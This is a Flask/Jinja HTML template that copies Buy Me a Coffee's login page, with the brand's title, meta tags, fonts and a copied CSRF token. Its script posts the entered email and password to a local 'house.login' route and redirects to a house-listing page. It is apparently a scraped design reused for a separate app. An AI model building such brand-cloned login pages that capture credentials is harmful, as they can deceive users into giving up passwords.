<!DOCTYPE html>
<html lang="en">
<head>
  <title>Login</title>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"/>
  <meta name="description"
        content=" Buy Me a Coffee is the best way for creators and artists to accept support and membership from their fans.">
  <meta property="og:url" content="http://www.buymeacoffee.com/login">
  <meta property="og:title" content="Login - Buy Me a Coffee">
  <meta name="og:description"
        content=" Buy Me a Coffee is the best way for creators and artists to accept support and membership from their fans.">
  <meta property="og:site_name" content="Buy Me a Coffee">
  <meta property="og:image" content="https://www.buymeacoffee.com/assets/img/bmc-meta-new/new/apple-icon-120x120.png">
  <meta property="og:type" content="website">
  <meta name="robots" content="noodp">
  <meta name="twitter:card" content="summary_large_image">
  <meta name="twitter:site" content="@buymeacoffee">
  <meta property="twitter:title" content="Login - Buy Me a Coffee">
  <meta name="twitter:creator" content="@buymeacoffee">
  <meta name="twitter:description"
        content=" Buy Me a Coffee is the best way for creators and artists to accept support and membership from their fans.">
  <meta property="twitter:image"
        content="https://www.buymeacoffee.com/assets/img/bmc-meta-new/new/apple-icon-120x120.png">
  <meta itemprop="name" content="Login - Buy Me a Coffee">
  <meta itemprop="description"
        content="Buy Me a Coffee is the best way for creators and artists to accept support and membership from their fans.">
  <meta property="image" content="https://www.buymeacoffee.com/assets/img/bmc-meta-new/new/apple-icon-120x120.png">
  <link rel="apple-touch-icon-precomposed" href="https://www.buymeacoffee.com/assets/img/bmc-meta-new/new/favicon.png"/>
  <link rel="manifest" href="https://www.buymeacoffee.com/assets/img/bmc-meta-new/new/manifest.json">
  <meta name="msapplication-TileColor" content="#ffffff">
  <meta name="msapplication-TileImage" content="https://www.buymeacoffee.com/assets/img/ms-icon-144x144.png">
  <meta name="theme-color" content="#ffffff">
  <link rel="preload" as="font" href="https://www.buymeacoffee.com/assets/build/fonts/fontawesome-webfont.woff2?v=4.7.0"
        crossorigin>
  <script src="https://lib.sinaapp.com/js/jquery/2.0.2/jquery-2.0.2.min.js" type="text/javascript"></script>
  <script src="{{ url_for('static', filename='js/house.js') }}"></script>
  <style>@font-face {
    font-family: "Avenir Light";
    src: url(https://www.buymeacoffee.com/assets/fonts/edefe737-dc78-4aa3-ad03-3c6f908330ed.eot?#iefix);
    src: url(https://www.buymeacoffee.com/assets/fonts/edefe737-dc78-4aa3-ad03-3c6f908330ed.eot?#iefix) format("eot"), url(https://www.buymeacoffee.com/assets/fonts/0078f486-8e52-42c0-ad81-3c8d3d43f48e.woff2) format("woff2"), url(https://www.buymeacoffee.com/assets/fonts/908c4810-64db-4b46-bb8e-823eb41f68c0.woff) format("woff"), url(https://www.buymeacoffee.com/assets/fonts/4577388c-510f-4366-addb-8b663bcc762a.ttf) format("truetype"), url(https://www.buymeacoffee.com/assets/fonts/b0268c31-e450-4159-bfea-e0d20e2b5c0c.svg#b0268c31-e450-4159-bfea-e0d20e2b5c0c) format("svg")
  }

  @font-face {
    font-family: "Avenir Roman";
    src: url(https://www.buymeacoffee.com/assets/fonts/57bf7902-79ee-4b31-a327-1bbf59a3d155.eot?#iefix);
    src: url(https://www.buymeacoffee.com/assets/fonts/57bf7902-79ee-4b31-a327-1bbf59a3d155.eot?#iefix) format("eot"), url(https://www.buymeacoffee.com/assets/fonts/b290e775-e0f9-4980-914b-a4c32a5e3e36.woff2) format("woff2"), url(https://www.buymeacoffee.com/assets/fonts/4b978f72-bb48-46c3-909a-2a8cd2f8819c.woff) format("woff"), url(https://www.buymeacoffee.com/assets/fonts/9bdf0737-f98c-477a-9365-ffc41b9d1285.ttf) format("truetype"), url(https://www.buymeacoffee.com/assets/fonts/15281d0d-e3c2-46e1-94db-cb681e00bfaa.svg#15281d0d-e3c2-46e1-94db-cb681e00bfaa) format("svg")
  }

  @font-face {
    font-family: "Avenir Heavy";
    src: url(https://www.buymeacoffee.com/assets/fonts/6af9989e-235b-4c75-8c08-a83bdaef3f66.eot?#iefix);
    src: url(https://www.buymeacoffee.com/assets/fonts/6af9989e-235b-4c75-8c08-a83bdaef3f66.eot?#iefix) format("eot"), url(https://www.buymeacoffee.com/assets/fonts/d513e15e-8f35-4129-ad05-481815e52625.woff2) format("woff2"), url(https://www.buymeacoffee.com/assets/fonts/61bd362e-7162-46bd-b67e-28f366c4afbe.woff) format("woff"), url(https://www.buymeacoffee.com/assets/fonts/ccd17c6b-e7ed-4b73-b0d2-76712a4ef46b.ttf) format("truetype"), url(https://www.buymeacoffee.com/assets/fonts/20577853-40a7-4ada-a3fb-dd6e9392f401.svg#20577853-40a7-4ada-a3fb-dd6e9392f401) format("svg")
  }

  @font-face {
    font-family: "Avenir Book";
    src: url(https://www.buymeacoffee.com/assets/fonts/710789a0-1557-48a1-8cec-03d52d663d74.eot?#iefix);
    src: url(https://www.buymeacoffee.com/assets/fonts/710789a0-1557-48a1-8cec-03d52d663d74.eot?#iefix) format("eot"), url(https://www.buymeacoffee.com/assets/fonts/065a6b14-b2cc-446e-9428-271c570df0d9.woff2) format("woff2"), url(https://www.buymeacoffee.com/assets/fonts/65d75eb0-2601-4da5-a9a4-9ee67a470a59.woff) format("woff"), url(https://www.buymeacoffee.com/assets/fonts/c70e90bc-3c94-41dc-bf14-caa727c76301.ttf) format("truetype"), url(https://www.buymeacoffee.com/assets/fonts/0979215b-3a1b-4356-9c76-e90fa4551f1d.svg#0979215b-3a1b-4356-9c76-e90fa4551f1d) format("svg")
  }

  @font-face {
    font-family: "Avenir Oblique";
    src: url(https://www.buymeacoffee.com/assets/fonts/1e9b2738-9316-4b0c-97c0-5423b69ea147.eot?#iefix);
    src: url(https://www.buymeacoffee.com/assets/fonts/1e9b2738-9316-4b0c-97c0-5423b69ea147.eot?#iefix) format("eot"), url(https://www.buymeacoffee.com/assets/fonts/1a7173fa-062b-49ad-9915-bc57d3bfc1f5.woff2) format("woff2"), url(https://www.buymeacoffee.com/assets/fonts/cdda031e-26e9-4269-83d1-5a218caa10db.woff) format("woff"), url(https://www.buymeacoffee.com/assets/fonts/6d1ce413-19e7-4b43-b328-6cdedc58b35a.ttf) format("truetype"), url(https://www.buymeacoffee.com/assets/fonts/33fac8ae-e7a5-4903-9ac1-c09a59b4c61d.svg#33fac8ae-e7a5-4903-9ac1-c09a59b4c61d) format("svg")
  }

  @font-face {
    font-family: "Avenir Black Oblique";
    src: url(https://www.buymeacoffee.com/assets/fonts/4030caeb-d266-4d36-ac58-a3bb7a5b1bfa.eot?#iefix);
    src: url(https://www.buymeacoffee.com/assets/fonts/4030caeb-d266-4d36-ac58-a3bb7a5b1bfa.eot?#iefix) format("eot"), url(https://www.buymeacoffee.com/assets/fonts/a2477e08-09d9-4d4b-97a9-23a1e22cb44c.woff2) format("woff2"), url(https://www.buymeacoffee.com/assets/fonts/19d12bba-92b1-43ad-9bab-cd36a4195c2a.woff) format("woff"), url(https://www.buymeacoffee.com/assets/fonts/5ba5a010-7470-4d9d-8a49-2920dc1be1f8.ttf) format("truetype"), url(https://www.buymeacoffee.com/assets/fonts/6d4a6a8c-ef50-422f-8456-88d479e0b23d.svg#6d4a6a8c-ef50-422f-8456-88d479e0b23d) format("svg")
  }

  @font-face {
    font-family: "Avenir Medium";
    src: url(https://www.buymeacoffee.com/assets/fonts/17b90ef5-b63f-457b-a981-503bb7afe3c0.woff2) format("woff2"), url(https://www.buymeacoffee.com/assets/fonts/c9aeeabd-dd65-491d-b4be-3e0db9ae47a0.woff) format("woff")
  }

  @font-face {
    font-family: "Avenir Black";
    src: url(https://www.buymeacoffee.com/assets/fonts/Avenir-Black.otf)
  }</style>
  <link rel="preload" href="https://www.buymeacoffee.com/assets/fonts/graphik/GraphikBold.otf" as="font" type="font/otf"
        crossorigin>
  <link rel="preload" href="https://www.buymeacoffee.com/assets/fonts/graphik/GraphikSemibold.otf" as="font"
        type="font/otf" crossorigin>
  <link rel="preload" href="https://www.buymeacoffee.com/assets/fonts/graphik/GraphikMedium.otf" as="font"
        type="font/otf" crossorigin>
  <link rel="preload" href="https://www.buymeacoffee.com/assets/fonts/graphik/GraphikRegular.otf" as="font"
        type="font/otf" crossorigin>
  <link rel="preload"
        href="https://www.buymeacoffee.com/assets/fonts/helvatica/ec6281a0-c9c4-4477-a360-156acd53093f.woff2" as="font"
        type="font/woff2" crossorigin>
  <link rel="preload"
        href="https://www.buymeacoffee.com/assets/fonts/helvatica/f9c5199e-a996-4c08-9042-1eb845bb7495.woff2" as="font"
        type="font/woff2" crossorigin>
  <link rel="preload"
        href="https://www.buymeacoffee.com/assets/fonts/helvatica/240c57a0-fdce-440d-9ce3-85e0cb56f470.woff2" as="font"
        type="font/woff2" crossorigin>
  <link rel="preload"
        href="https://www.buymeacoffee.com/assets/fonts/helvatica/08b57253-2e0d-4c12-9c57-107f6c67bc49.woff2" as="font"
        type="font/woff2" crossorigin>
  <link rel="shortcut icon" href="{{ url_for('static', filename='house_icon.png') }}" type="image/x-icon">
  <link rel="preload"
        href="https://www.buymeacoffee.com/assets/fonts/helvatica/800da3b0-675f-465f-892d-d76cecbdd5b1.woff2" as="font"
        type="font/woff2" crossorigin>
  <link rel="preload"
        href="https://www.buymeacoffee.com/assets/fonts/helvatica/7b415a05-784a-4a4c-8c94-67e9288312f5.woff" as="font"
        type="font/woff" crossorigin>
  <link rel="preload"
        href="https://www.buymeacoffee.com/assets/fonts/helvatica/7e42a406-9133-48c0-a705-4264ac520b43.woff2" as="font"
        type="font/woff2" crossorigin>
  <style>@font-face {
    font-family: "Graphik 900";
    src: url(https://www.buymeacoffee.com/assets/fonts/graphik/GraphikBold.otf) format("opentype");
    font-display: swap
  }

  @font-face {
    font-family: "Graphik 800";
    src: url(https://www.buymeacoffee.com/assets/fonts/graphik/GraphikSemibold.otf) format("opentype");
    font-display: swap
  }

  @font-face {
    font-family: "Graphik 600";
    src: url(https://www.buymeacoffee.com/assets/fonts/graphik/GraphikMedium.otf) format("opentype");
    font-display: swap
  }

  @font-face {
    font-family: "Graphik 400";
    src: url(https://www.buymeacoffee.com/assets/fonts/graphik/GraphikRegular.otf) format("opentype");
    font-display: swap
  }

  @font-face {
    font-family: "Helvetica Neue Ultra light";
    src: url(https://www.buymeacoffee.com/assets/fonts/helvatica/ec6281a0-c9c4-4477-a360-156acd53093f.woff2) format("woff2"), url(https://www.buymeacoffee.com/assets/fonts/helvatica/11066b40-10f7-4123-ba58-d9cbf5e89ceb.woff) format("woff");
    font-display: swap
  }

  @font-face {
    font-family: "Helvetica Neue light";
    src: url(https://www.buymeacoffee.com/assets/fonts/helvatica/f9c5199e-a996-4c08-9042-1eb845bb7495.woff2) format("woff2"), url(https://www.buymeacoffee.com/assets/fonts/helvatica/2a34f1f8-d701-4949-b12d-133c1c2636eb.woff) format("woff");
    font-display: swap
  }

  @font-face {
    font-family: "Helvetica Neue Medium";
    src: url(https://www.buymeacoffee.com/assets/fonts/helvatica/240c57a0-fdce-440d-9ce3-85e0cb56f470.woff2) format("woff2"), url(https://www.buymeacoffee.com/assets/fonts/helvatica/7802e576-2ffa-4f22-a409-534355fbea79.woff) format("woff");
    font-display: swap
  }

  @font-face {
    font-family: "Helvetica Neue Roman";
    src: url(https://www.buymeacoffee.com/assets/fonts/helvatica/08b57253-2e0d-4c12-9c57-107f6c67bc49.woff2) format("woff2"), url(https://www.buymeacoffee.com/assets/fonts/helvatica/08edde9d-c27b-4731-a27f-d6cd9b01cd06.woff) format("woff");
    font-display: swap
  }

  @font-face {
    font-family: "Helvetica Neue Roman Bold";
    src: url(https://www.buymeacoffee.com/assets/fonts/helvatica/800da3b0-675f-465f-892d-d76cecbdd5b1.woff2) format("woff2"), url(https://www.buymeacoffee.com/assets/fonts/helvatica/7b415a05-784a-4a4c-8c94-67e9288312f5.woff) format("woff");
    font-display: swap
  }

  @font-face {
    font-family: "Helvetica Neue Heavy";
    src: url(https://www.buymeacoffee.com/assets/fonts/helvatica/7e42a406-9133-48c0-a705-4264ac520b43.woff2) format("woff2"), url(https://www.buymeacoffee.com/assets/fonts/helvatica/7e42a406-9133-48c0-a705-4264ac520b43.woff) format("woff");
    font-display: swap
  }</style>
  <link rel="stylesheet"
        href="https://www.buymeacoffee.com/assets/build/css/bmc-public-build.min.2021.10.27.10.22.19.css">
  <style>.auth-modal-title {
    padding-top: 0
  }</style>
</head>
<body class="">
<noscript>
  <meta HTTP-EQUIV="refresh" content="0;url='http://www.buymeacoffee.com/login?PageSpeed=noscript'"/>
  <style><!--
  table, div, span, font, p {
    display: none
  }

  --></style>
  <div style="display:block">Please click <a href="http://www.buymeacoffee.com/login?PageSpeed=noscript">here</a> if you
    are not redirected within a few seconds.
  </div>
</noscript>
<input type="hidden" id="csrf" name="bmc_csrf_token" value="5c383e975622e7c5c125008131104b18">
<input type="hidden" value="" id="redirect-with-offer-link"/>
<input type="hidden" value="" id="redirect-login-form-slug"/>
<input type="hidden" value="" id="from_page"/>
<input type="hidden" value="0" id="is_home_papage"/>
<input type="hidden" value="0" id="any_change">
<div class="flex md-flex-wrap signup-step-1 pd-b-24">
  <div class="w-100 pd-l-64 pd-r-64 auth-main-wrap md-w-100 md-pd-0">
    <div class="flex flex-sp-btw auth-head flex-vert-center pd-t-24 md-pd-r-l-16 w-100">
    </div>
    <div class="flex flex-both-center signup-wrap mg-t-64 md-pd-r-l-32">
      <div class="w-400px until-lg-w-50 xs-w-70 xxs-w-100">
        <div class="av-black color-222 text-fs-32 ln-h-50 text-center">Welcome back</div>
        <div class="av-roman text-fs-16 clr-dark-05 align-center mg-t-32 block-bf-af p-relative">login with email
        </div>
        <div class="mg-t-32" id="check-user-form">
          <div class="input-each">
            <input type="text"
                   class="bmc-input-box bmc-input-box-h48 text-fs-16 clr-dark av-roman w-100 bmc-input-field req-field request-on-enter-login "
                   data-name="email address" data-error-type="required" id="login-email" placeholder="Email"
                   name="email" value="">

            <input type="password"
                   class="bmc-input-box bmc-input-box-h48 text-fs-16 clr-dark av-roman w-100 bmc-input-field req-field request-on-enter-login "
                   data-name="email address" data-error-type="required" id="login-pwd" placeholder="Password"
                   name="pwd" value="">

            <div id="err_message" class="bmc-error text-fs-14 av-roman mg-t-8 error-login-email error-element" style="display: none">
            </div>
          </div>
          <div class="input-each show-for-ctr" style="display: none">
            <input type="password"
                   class="bmc-input-box bmc-input-box-h48 text-fs-16 clr-dark av-roman w-100 mg-t-16 request-on-enter-login"
                   data-name="password" data-error-type="required" id="login-password" placeholder="Password"
                   name="password" value="">
            <div class="bmc-error text-fs-14 av-roman mg-t-8 error-login-password error-element"
                 style="display: none"></div>
          </div>
          <div class="captcha-wrapper show-for-ctr" style="display: none">
            <input type="hidden" id="captcha-fail-login" value="1"/>
            <div id="captcha_element_login" class="m-t-20"></div>
            <p class="captcha-err bmc-error text-fs-14 av-roman mg-t-8 error-element" style="display:none"></p>
          </div>
          <div class="input-each show-otp-field" style="display: none">
            <input type="number"
                   class="bmc-input-box bmc-input-box-h48 text-fs-16 clr-dark av-roman w-100 mg-t-16 request-on-enter-login"
                   data-name="otp" data-error-type="mg_custom" id="login-otp" placeholder="Paste login code" name="otp"
                   value="">
            <div class="bmc-error text-fs-14 av-roman mg-t-8 error-element" style="display: none"></div>
            <div class="av-roman text-fs-16 ln-h-22 clr-grey mg-t-12">We just sent you a temporary login code. please
              check your inbox.
            </div>
          </div>
          <button class="bmc-yellow-btn w-100 br-r-57 color-2121 av-heavy text-fs-16 ln-h-22 mg-t-32 p-relative flex flex-both-center dark-loader c-pointer"
                  data-form="check-user" id="login-btn" onclick="CheckUser(document.getElementById('login-email').value, document.getElementById('login-pwd').value)">
            <span>Continue with email</span>
            <div class="btn-loader p-absolute" style="display: none">
              <svg class="btn-dot-loader" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
                   style="margin:auto;display:block;" width="48px" height="48px" viewBox="0 0 100 100"
                   preserveAspectRatio="xMidYMid">
                <g transform="translate(25 50)">
                  <circle cx="0" cy="0" r="10" fill="#222222">
                    <animateTransform attributeName="transform" type="scale" begin="-0.4444444444444444s"
                                      calcMode="spline" keySplines="0.3 0 0.7 1;0.3 0 0.7 1" values="0;1;0"
                                      keyTimes="0;0.5;1" dur="1.3333333333333333s"
                                      repeatCount="indefinite"></animateTransform>
                  </circle>
                </g>
                <g transform="translate(50 50)">
                  <circle cx="0" cy="0" r="10" fill="#222222">
                    <animateTransform attributeName="transform" type="scale" begin="-0.2222222222222222s"
                                      calcMode="spline" keySplines="0.3 0 0.7 1;0.3 0 0.7 1" values="0;1;0"
                                      keyTimes="0;0.5;1" dur="1.3333333333333333s"
                                      repeatCount="indefinite"></animateTransform>
                  </circle>
                </g>
                <g transform="translate(75 50)">
                  <circle cx="0" cy="0" r="10" fill="#222222">
                    <animateTransform attributeName="transform" type="scale" begin="0s" calcMode="spline"
                                      keySplines="0.3 0 0.7 1;0.3 0 0.7 1" values="0;1;0" keyTimes="0;0.5;1"
                                      dur="1.3333333333333333s" repeatCount="indefinite"></animateTransform>
                  </circle>
                </g>
              </svg>
            </div>
          </button>
          <div class="align-center">
            <div class="av-roman text-fs-16 ln-h-22 clr-grey mg-t-24 align-center text-decoration-ul c-pointer dark-loader show-for-supp p-relative dis-inline-block"
                 style="display: none">
              <div class="flex flex-both-center">
                <span>Resend email</span>
                <div class="circle-loader sm-circle-loader br-r-50p p-absolute" style="display:none;">
                  <div class="checkedmark" style="display:none;">
                    <svg style="margin-top: -1px;" width="24" height="24" viewBox="0 0 24 24" fill="none"
                         xmlns="http://www.w3.org/2000/svg">
                      <path fill-rule="evenodd" clip-rule="evenodd"
                            d="M12 24C18.6274 24 24 18.6274 24 12C24 5.37258 18.6274 0 12 0C5.37258 0 0 5.37258 0 12C0 18.6274 5.37258 24 12 24Z"
                            fill="white"/>
                      <path d="M15.6454 8.25772C15.9891 7.91409 16.5462 7.91409 16.8898 8.25772C17.212 8.57988 17.2321 9.08969 16.9502 9.4353L16.8898 9.50213L10.6497 15.7423C10.3275 16.0644 9.81773 16.0846 9.47212 15.8027L9.40529 15.7423L6.25772 12.5947C5.91409 12.2511 5.91409 11.6939 6.25772 11.3503C6.57988 11.0282 7.08969 11.008 7.4353 11.2899L7.50213 11.3503L10.0271 13.875L15.6454 8.25772Z"
                            fill="#FF813F"/>
                      ,
                      <mask id="mask0" mask-type="alpha" maskUnits="userSpaceOnUse" x="6" y="8" width="12" height="8">
                        <path d="M15.6454 8.25772C15.9891 7.91409 16.5462 7.91409 16.8898 8.25772C17.212 8.57988 17.2321 9.08969 16.9502 9.4353L16.8898 9.50213L10.6497 15.7423C10.3275 16.0644 9.81773 16.0846 9.47212 15.8027L9.40529 15.7423L6.25772 12.5947C5.91409 12.2511 5.91409 11.6939 6.25772 11.3503C6.57988 11.0282 7.08969 11.008 7.4353 11.2899L7.50213 11.3503L10.0271 13.875L15.6454 8.25772Z"
                              fill="white"/>
                      </mask>
                      <g mask="url(#mask0)"></g>
                    </svg>
                  </div>
                </div>
              </div>
            </div>
          </div>
          <div class="align-center">
            <div class="av-roman text-fs-16 ln-h-22 clr-grey mg-t-24 text-decoration-ul c-pointer show-if-pass-worng dis-inline-block"
                 onclick="resetPassword(this)" style="display: none">Forgot password?
            </div>
          </div>
          <div class="av-roman text-fs-16 ln-h-22 clr-grey mg-t-12 align-center reset-email-not" style="display:none;">
            If an account with that email address exists, you will receive a link to reset your password.
          </div>
        </div>
      </div>
    </div>
  </div>
</div>
<script>
  function CheckUser(email, pwd) {
  $.ajax({
    url: '{{ url_for('house.login', page=1) }}',
    type: 'post',
    data: {"email": email, "password": pwd},
    dataType: 'json',
    success: function (response) {
      console.log(response);
      if (response.status != 200) {
        div = document.getElementById('err_message');
        div.innerText = "账户不存在！"
        div.style.display = 'block';
      }
      else {
        window.location.href = '{{ url_for('house.listing', page=1) }}'
      }
    },
    error: function (response) {
      console.log(response);
      var result = JSON.parse(JSON.stringify(response.responseJSON));
      if (result.status != null && result.status != 200){
        div = document.getElementById('err_message');
        div.innerText = result.msg;
        div.style.display = 'block';
      }
    }
  })
};




$("#login-pwd").keydown(function(e) {
      console.log("xxxx");
     if (e.keyCode == 13) {
            $("#login-btn").click();
     }
});

</script>
</body>
</html>
